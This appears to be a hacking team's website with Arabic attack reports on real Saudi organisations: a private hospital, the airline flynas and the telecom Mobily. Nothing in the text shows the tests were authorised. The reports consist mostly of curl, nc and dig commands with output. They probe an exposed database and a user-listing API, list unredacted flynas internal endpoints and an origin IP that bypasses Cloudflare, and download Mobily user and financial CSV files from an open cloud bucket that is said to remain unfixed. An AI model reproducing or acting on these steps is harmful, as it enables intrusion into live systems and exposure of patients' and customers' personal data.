NO MERCY

GRILSY NEVER DIES

The GRILSY

Access Is Inevitable

Team Member

kabus

Captain & Lead Dev

Precision over presence.

Team Member

VAliiVer

Security Systems Analyst

Grilsy soldier

Team Member

VEX0

CO CAPTAIN

“Security is an illusion until proven otherwise.”

Team Member

ms6ool

HONORARY LEGEND

اسم يسطره التاريخ في هذا التيم.

“Gone, but never forgotten.”

HALL OF FAME

2nd Place
plfanzen CTF 2026

SECURITY REPORTS

التقرير الأمني الشامل - مستشفى أبها الخاص العالمي

تاريخ التقرير: 15 مايو 2026 الهدف: aph.med.sa
External PT

ملخص تنفيذي

تم اكتشاف 25 ثغرة أمنية. أخطرها: قاعدة بيانات MariaDB مكشوفة للإنترنت على المنفذ 3306، مما يسمح لأي مخترق بمحاولة اختراق قاعدة بيانات المستشفى التي تحتوي على بيانات المرضى والمواعيد والمستخدمين.

CRITICAL ثغرة حرجة: قاعدة بيانات MariaDB مكشوفة

  • IP: [REDACTED IP]
  • المنفذ: 3306/TCP
  • الحالة: مفتوحة وقابلة للاتصال

الدليل القاطع (PoC):

$ nc -zv [REDACTED IP] 3306 Connection to [REDACTED IP] port 3306 [tcp/mysql] succeeded! Banner (decoded): 11.8.6-MariaDB-log ... mysql_native_password

HIGH ثغرة عالية: تسريب بيانات المستخدمين عبر REST API

المسار: GET /wp-json/wp/v2/users (بدون مصادقة)

الدليل القاطع (PoC):

$ curl -s https://[REDACTED DOMAIN]/wp-json/wp/v2/users [{"id":1,"name":"[REDACTED ADMIN]","slug":"[REDACTED ADMIN]"}]

التوصيات العاجلة

  • إغلاق منفذ 3306 (MariaDB) ومنفذ 21 (FTP) على جدار الحماية فوراً.
  • تحديث Elementor من 3.19.0 لسد ثغرة CVE-2024-24934.
  • تقييد الوصول إلى REST API وتعطيل XML-RPC.

تقرير الاختبار الأمني الشامل لـ flynas

تاريخ التقرير: 14 مايو 2026 الهدف: itsd.flynas.com (IT Service Desk Portal)
Infrastructure PT

ملخص التنفيذ

تم اكتشاف ثغرات حرجة وعالية الخطورة في بنية flynas التحتية تشمل: تسريب IP الخادم الأصلي، كشف 20+ نقطة نهاية Azure داخلية، نظام إدارة الطاقم مكشوف على الإنترنت، والمزيد.

CRITICAL ثغرة C-01: تسريب بنية Microfrontend الكاملة

تم استخراج خريطة الـ Imports (Import Map) بالكامل من uat-apps.flynas.com، مما كشف عن 20+ رابط لخدمات Azure داخلية، مع تأكيد وجود CORS مفتوح عليها.

$ curl -s "https://uat-apps.flynas.com" # كشف عن Import Map كامل: @app/layout → app-layout-uat-frontend-westeurope.azurewebsites.net @app/gpd → app-gpd-frontend-westeurope-fudbf0adb5gchhcd.westeurope-01.azurewebsites.net @app/iam → app-iam-uat-frontend-westeurope-fqccekhgcxdmetd2.westeurope-01.azurewebsites.net @app/sadad → app-sadad-frontend-westeurope.azurewebsites.net @app/refund → app-refund-admin-uat-frontend-westeurope.azurewebsites.net @app/crew-meal → app-crew-meal-frontend-uat-westeurope-efadfec6hadgcccj.westeurope-01.azurewebsites.net @app/crew-control → app-crewcontrol-frontend-uat-westeurope-a5cjcvche6axbtgk.westeurope-01.azurewebsites.net @app/sita-messages → app-sita-messages-front-uat-westurope.azurewebsites.net @app/amos-interfaces → app-amos-interfaces-front-uat-westurope.azurewebsites.net @app/jeppesen-interfaces → as-jeppesen-interfaces-frontend-uat-we-eahte2hac5avbycv.westeurope-01.azurewebsites.net @app/baggage-management → app-baggagemanage-frontend-uat-hjb9byfjgmakbbcj.westeurope-01.azurewebsites.net @app/digital-cabin → app-digital-cab-admin-front-uat-westeurope-f4eqgmfgh4c7h4fx.westeurope-01.azurewebsites.net @app/settings → app-global-setting-uat-frontend-westeurope.azurewebsites.net @app/einvoice → app-invoice-uat-frontend-westeurope.azurewebsites.net @app/notification → app-notification-frontend-westeurope.azurewebsites.net @app/flight-disruption → app-flight-disruption-frontend-uat-westeurope.azurewebsites.net @app/catering-portal → app-catering-portal-frontend-uat-westeurope-eme7ezajc3e8a5gp.westeurope-01.azurewebsites.net @app/chatbot-admin → flynaschb-adminca-qa.happyriver-3cb1d7d1.westeurope.azurecontainerapps.io @app/chatbot-admin-uat → flynascb-frontend-admin-uat.redsand-c21a38f7.westeurope.azurecontainerapps.io @app/chatbot-admin-preprod → flynaschb-prprd-admin-exgacqfqfmf8eha6.a02.azurefd.net $ curl -sI "https://app-layout-uat-frontend-westeurope.azurewebsites.net" # Access-Control-Allow-Origin: * # Access-Control-Allow-Headers: Authorization

CRITICAL ثغرة C-02: تسريب IP الخادم الأصلي

تم اكتشاف الـ Origin IP لـ itsd.flynas.com من خلال البحث المفتوح، مما يسمح بالوصول المباشر للخادم وتجاوز حماية Cloudflare.

$ curl -sI "https://itsd.flynas.com" HTTP/1.1 403 Forbidden Server: cloudflare Cf-Mitigated: challenge CF-RAY: 9fbc09ab5849e1b7-MRS $ curl -s "https://api.hackertarget.com/hostsearch/?q=flynas.com" itsd.flynas.com,213.232.241.210 www.flynas.com,104.16.149.116 uat-apps.flynas.com,20.105.216.41 survey.flynas.com,20.50.2.92 ecrewaz.flynas.com,51.137.53.199 oicprod.flynas.com,158.101.226.152 help.flynas.com,20.105.216.45 $ curl -H "Host: itsd.flynas.com" "http://213.232.241.210"

HIGH ثغرة H-02: نظام إدارة الطاقم مكشوف

نظام ecrewaz.flynas.com مكشوف للإنترنت ويعمل على خوادم IIS. تم تسريب الـ Anti-forgery Token، وطريقة التشفير المحلية (SHA-512)، ومسار تسجيل الدخول المشفر.

$ curl -sI "https://ecrewaz.flynas.com" # server: Microsoft-IIS/10.0 # ApplicationGatewayAffinityCORS cookie # التوجيه التلقائي: <meta http-equiv="refresh" content="0; URL='http://ecrewaz.flynas.com/ecrew'"/> # مسار تسجيل الدخول المشفر: /ecrew/Login/KpQ8xdXlR7ZRWLAPfO2Lz3XsEiwFso_D4b4j9ASi8G-QVGxt1-HK4r7FQr0ULolu

HIGH ثغرة H-01: nginx قديم + CORS

خادم survey.flynas.com يعمل بنسخة قديمة جدًا (nginx/1.17.1) والتي تحتوي على ثغرات (CVEs) معروفة. الخادم يمتلك إعدادات CORS غير آمنة ويكشف عن الـ Source Map للتطبيق.

$ curl -sI "https://survey.flynas.com" # Server: nginx/1.17.1 # Access-Control-Allow-Origin: * $ curl -sI "https://survey.flynas.com/static/js/main.a2a1d11d.js.map" # HTTP/1.1 200 OK

MEDIUM الكشف عن البنية التحتية الشاملة

تم رسم خريطة لـ 53 نطاق فرعي تشمل بوابات داخلية، وخدمات سحابية متنوعة:

$ curl -sL --insecure "https://oicprod.flynas.com" # إعادة توجيه إلى Oracle Cloud: https://design.integration.me-jeddah-1.ocp.oraclecloud.com/?integrationInstance=prodint01-axrgu2j1ypmj-je $ curl -s "https://help.flynas.com/en" # Next.js SPA مع New Relic, PNR lookup, OTP

تقرير الاستغلال (Exploitation Report) - موبايلي

تاريخ التقرير: 16 مايو 2026 الهدف: mobily.com.sa
Exploitation PT

CRITICAL تسريب بيانات المستخدمين (Cloud Storage)

تم اكتشاف Bucket مفتوح للعامة وقابل للقراءة والتصفح بدون أي مصادقة.

$ curl "https://storage.googleapis.com/storage/v1/b/[REDACTED BUCKET]/o" # النتيجة: قائمة بكل الملفات (1000+ ملف) — صور مستخدمين، ملفات CSV، PDF $ curl "https://storage.googleapis.com/[REDACTED BUCKET]/[REDACTED]_Transactions.csv" # تنزيل تقارير مالية $ curl -o userdata.csv "https://storage.googleapis.com/[REDACTED BUCKET]/[REDACTED]_Users.csv" # تنزيل قاعدة بيانات المستخدمين (65MB+)

البيانات المكشوفة:

  • أرقام هواتف: 512345XXXXX, ...
  • User IDs: GSME[REDACTED], ...
  • إيميلات: v***2@yopmail.com, d***5@gmail.com
  • المعاملات المالية: محافظ إلكترونية، مكافآت، أكواد دفع (مثل [REDACTED CODE])
  • مسارات داخلية: .aws/credentials, laravel/.env

CRITICAL ثغرة Login API & CORS & User Enumeration

اكتشاف مسارات API تعمل بدون توثيق وتسمح بمعرفة المستخدمين (User Enumeration)، مع وجود CORS مفتوح بالكامل يسمح بهجمات CSRF.

$ curl -s -X POST "https://[REDACTED API HOST]/api/auth/signin" \ -H "Content-Type: application/json" \ -d '{"username":"test@test.com","password":"Test1234"}' $ curl -sI "https://[REDACTED API HOST]/" | grep -i access-control # access-control-allow-origin: * # access-control-allow-credentials: true

HIGH تسريب البنية التحتية الداخلية

$ curl -s "http://[REDACTED IP]/" | grep "IBM_HTTP_Server" # IBM_HTTP_Server Server at [REDACTED IP] Port 8080 $ dig mobily.com.sa SOA +short # [REDACTED].prod.mobily.lan

HIGH الكشف عن الخوادم الداخلية والتطبيقات (Subdomain Map)

تم إجراء Mapping كامل لـ 17 نطاق فرعي، وتحديد تقنيات حرجة مرتبطة بـ CVEs معروفة:

  • IBM WebSphere 8.5/9.0: قابل للـ RCE (CVE-2025-36038) و XXE
  • F5 BIG-IP: (Authentication Bypass CVE-2022-1388)
  • Microsoft ADFS: (SSRF CVE-2021-43907)

CRITICAL إحصائيات تسريب البيانات

  • إجمالي الملفات المكشوفة: 1000+ ملف
  • إجمالي بيانات المستخدمين المكشوفة: 257.3 MB
  • أكبر ملف قاعدة بيانات: 70.5 MB (يحتوي على آلاف المستخدمين)
  • الحالة: مفتوحة — لم يتم إصلاحها